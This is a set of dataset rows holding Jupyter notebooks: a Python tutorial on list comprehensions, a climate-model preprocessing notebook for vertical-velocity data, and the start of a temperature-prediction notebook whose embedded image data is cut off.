[ [ [ "# List Comprehensions\n\nIn addition to sequence operations and list methods, Python includes a more advanced operation called a list comprehension.\n\nList comprehensions allow us to build out lists using a different notation. You can think of it as essentially a one line <code>for</code> loop built inside of brackets. For a simple example:\n## Example 1", "_____no_output_____" ] ], [ [ "# Grab every letter in string\nlst = [x for x in 'word']", "_____no_output_____" ], [ "# Check\nlst", "_____no_output_____" ] ], [ [ "This is the basic idea of a list comprehension. If you're familiar with mathematical notation this format should feel familiar for example: x^2 : x in { 0,1,2...10 } \n\nLet's see a few more examples of list comprehensions in Python:\n## Example 2", "_____no_output_____" ] ], [ [ "# Square numbers in range and turn into list\nlst = [x**2 for x in range(0,11)]", "_____no_output_____" ], [ "lst", "_____no_output_____" ] ], [ [ "## Example 3\nLet's see how to add in <code>if</code> statements:", "_____no_output_____" ] ], [ [ "# Check for even numbers in a range\nlst = [x for x in range(11) if x % 2 == 0]", "_____no_output_____" ], [ "lst", "_____no_output_____" ] ], [ [ "## Example 4\nCan also do more complicated arithmetic:", "_____no_output_____" ] ], [ [ "# Convert Celsius to Fahrenheit\ncelsius = [0,10,20.1,34.5]\n\nfahrenheit = [((9/5)*temp + 32) for temp in celsius ]\n\nfahrenheit", "_____no_output_____" ] ], [ [ "## Example 5\nWe can also perform nested list comprehensions, for example:", "_____no_output_____" ] ], [ [ "lst = [ x**2 for x in [x**2 for x in range(11)]]\nlst", "_____no_output_____" ] ], [ [ "Later on in the course we will learn about generator comprehensions. After this lecture you should feel comfortable reading and writing basic list comprehensions.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
cb209999c0a26f36a713b22c21a9e91dd2d84cdd
7,729
ipynb
Jupyter Notebook
MAPS/Latant_Space_Constrained_VAEs/Mooers_Logbook/Diunral_Cycles/Preprocessor_For_W_Variable_Data.ipynb
gmooers96/CBRAIN-CAM
c5a26e415c031dea011d7cb0b8b4c1ca00751e2a
[ "MIT" ]
null
null
null
MAPS/Latant_Space_Constrained_VAEs/Mooers_Logbook/Diunral_Cycles/Preprocessor_For_W_Variable_Data.ipynb
gmooers96/CBRAIN-CAM
c5a26e415c031dea011d7cb0b8b4c1ca00751e2a
[ "MIT" ]
null
null
null
MAPS/Latant_Space_Constrained_VAEs/Mooers_Logbook/Diunral_Cycles/Preprocessor_For_W_Variable_Data.ipynb
gmooers96/CBRAIN-CAM
c5a26e415c031dea011d7cb0b8b4c1ca00751e2a
[ "MIT" ]
5
2019-09-30T20:17:13.000Z
2022-03-01T07:03:30.000Z
35.454128
209
0.618579
[ [ [ "import numpy as np\nimport itertools\nimport math\nimport scipy\nfrom scipy import spatial\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport matplotlib.patches as patches\nfrom matplotlib import animation\nfrom matplotlib import transforms\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nimport xarray as xr\nimport dask\nfrom sklearn.cluster import KMeans\nfrom sklearn.cluster import AgglomerativeClustering\nimport pandas as pd\nimport netCDF4", "_____no_output_____" ], [ "def plot_generator_paper(sample, X, Z):\n \n fz = 15*1.25\n lw = 4\n siz = 100\n XNNA = 1.25 # Abscissa where architecture-constrained network will be placed\n XTEXT = 0.25 # Text placement\n YTEXT = 0.3 # Text placement\n \n plt.rc('text', usetex=False)\n matplotlib.rcParams['mathtext.fontset'] = 'stix'\n matplotlib.rcParams['font.family'] = 'STIXGeneral'\n #mpl.rcParams[\"font.serif\"] = \"STIX\"\n plt.rc('font', family='serif', size=fz)\n matplotlib.rcParams['lines.linewidth'] = lw\n \n \n cmap=\"RdBu_r\"\n fig, ax = plt.subplots(1,1, figsize=(15,6))\n cs0 = ax.pcolor(X, Z, sample, cmap=cmap, vmin=-1.0, vmax = 1.0)\n ax.set_title(\"Anomalous Vertical Velocity Field Detected By ELBO\")\n ax.set_ylim(ax.get_ylim()[::-1])\n ax.set_xlabel(\"CRMs\", fontsize=fz*1.5)\n ax.xaxis.set_label_coords(0.54,-0.05)\n h = ax.set_ylabel(\"hPa\", fontsize = fz*1.5)\n h.set_rotation(0)\n ax.yaxis.set_label_coords(-0.10,0.44)\n #y_ticks = np.arange(1350, 0, -350)\n #ax.set_yticklabels(y_ticks, fontsize=fz*1.33)\n ax.tick_params(axis='x', labelsize=fz*1.33)\n ax.tick_params(axis='y', labelsize=fz*1.33)\n divider = make_axes_locatable(ax)\n cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n cbar = fig.colorbar(cs0, cax=cax)\n cbar.set_label(label=r'$\\left(\\mathrm{m\\ s^{-1}}\\right)$', rotation=\"horizontal\", fontsize=fz*1.5, labelpad=30, y = 0.65)\n plt.show()\n #plt.savefig(\"/fast/gmooers/gmooers_git/CBRAIN-CAM/MAPS/CI_Figure_Data/Anomaly.pdf\")\n \n#plot_generator(test[0,:,:])", "_____no_output_____" ], [ "path_to_file = '/DFS-L/DATA/pritchard/gmooers/Workflow/MAPS/SPCAM/100_Days/New_SPCAM5/archive/TimestepOutput_Neuralnet_SPCAM_216/atm/hist/TimestepOutput_Neuralnet_SPCAM_216.cam.h1.2009-01-20-00000.nc'\nextra_variables = xr.open_dataset(path_to_file)\nlats = np.squeeze(extra_variables.LAT_20s_to_20n.values)\nlons = np.squeeze(extra_variables.LON_0e_to_360e.values)", "_____no_output_____" ], [ "path_to_file = '/DFS-L/DATA/pritchard/gmooers/Workflow/MAPS/SPCAM/100_Days/New_SPCAM5/archive/TimestepOutput_Neuralnet_SPCAM_216/atm/hist/TimestepOutput_Neuralnet_SPCAM_216.cam.h1.20*'\nextra_variables = xr.open_mfdataset(path_to_file)\namazon = xr.DataArray.squeeze(extra_variables.CRM_W_LON_0e_to_360e_LAT_20s_to_20n[:,:,:,:,10,-29])\natlantic = xr.DataArray.squeeze(extra_variables.CRM_W_LON_0e_to_360e_LAT_20s_to_20n[:,:,:,:,10,121])\nprint(amazon.shape)", "_____no_output_____" ], [ "others = netCDF4.Dataset(\"/fast/gmooers/Raw_Data/extras/TimestepOutput_Neuralnet_SPCAM_216.cam.h1.2009-01-01-00000.nc\")\nlevs = np.array(others.variables['lev'])\nnew = np.flip(levs)\ncrms = np.arange(1,129,1)\nXs, Zs = np.meshgrid(crms, new)", "_____no_output_____" ], [ "Max_Scalar = np.load(\"/fast/gmooers/Preprocessed_Data/W_Variable/Space_Time_Max_Scalar.npy\")\nMin_Scalar = np.load(\"/fast/gmooers/Preprocessed_Data/W_Variable/Space_Time_Min_Scalar.npy\")", "_____no_output_____" ], [ "day_images = amazon[16:112,:,:]\nweek_images = amazon[16:112*6+16,:,:]\nsynoptic_imagess = amazon[16:112*13,:,:]\n\natlantic_day_images = atlantic[5:101,:,:]\natlantic_week_images = atlantic[5:96*7+5,:,:]\natlantic_synoptic_imagess = atlantic[5:96*14+5,:,:]", "_____no_output_____" ], [ "Test_Day = np.interp(day_images, (Min_Scalar, Max_Scalar), (0, 1))\nTest_Week = np.interp(week_images, (Min_Scalar, Max_Scalar), (0, 1))\nTest_Synoptic = np.interp(synoptic_imagess, (Min_Scalar, Max_Scalar), (0, 1))\n\natlantic_Test_Day = np.interp(atlantic_day_images, (Min_Scalar, Max_Scalar), (0, 1))\natlantic_Test_Week = np.interp(atlantic_week_images, (Min_Scalar, Max_Scalar), (0, 1))\natlantic_Test_Synoptic = np.interp(atlantic_synoptic_imagess, (Min_Scalar, Max_Scalar), (0, 1))", "_____no_output_____" ], [ "np.save(\"/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_test_day.npy\",Test_Day)\nnp.save(\"/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_test_week.npy\",Test_Week)\nnp.save(\"/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_test_synoptic.npy\",Test_Synoptic)", "_____no_output_____" ], [ "np.save(\"/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_atlantic_test_day.npy\",atlantic_Test_Day)\nnp.save(\"/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_atlantic_test_week.npy\",atlantic_Test_Week)\nnp.save(\"/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_atlantic_test_synoptic.npy\",atlantic_Test_Synoptic)", "_____no_output_____" ], [ "All_amazon = np.interp(amazon[16:,:,:], (Min_Scalar, Max_Scalar), (0, 1))\nAll_Atlantic = np.interp(atlantic[5:,:,:], (Min_Scalar, Max_Scalar), (0, 1))", "_____no_output_____" ], [ "np.save(\"/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_test_amazon_all.npy\",All_amazon)\nnp.save(\"/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_test_atlantic_all.npy\",All_Atlantic)", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb209a84e4f0d5dc45e9d76ecc2063cd49b4513d
223,596
ipynb
Jupyter Notebook
Embedded Software/Algorithm/BAVA_Temp_Predictions.ipynb
JaccoVeldscholten/SmartDispenser
6b3dfddaeef67293853557a0e8b6b49ca562f1db
[ "MIT" ]
null
null
null
Embedded Software/Algorithm/BAVA_Temp_Predictions.ipynb
JaccoVeldscholten/SmartDispenser
6b3dfddaeef67293853557a0e8b6b49ca562f1db
[ "MIT" ]
null
null
null
Embedded Software/Algorithm/BAVA_Temp_Predictions.ipynb
JaccoVeldscholten/SmartDispenser
6b3dfddaeef67293853557a0e8b6b49ca562f1db
[ "MIT" ]
null
null
null
159.82559
40,244
0.841907
[ [ [ "<a href=\"https://colab.research.google.com/github/JaccoVeldscholten/SmartDispenser/blob/main/BAVA_Temp_Predictions.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>", "_____no_output_____" ], [ "<div>\n<img src=\"data:image/png;base64,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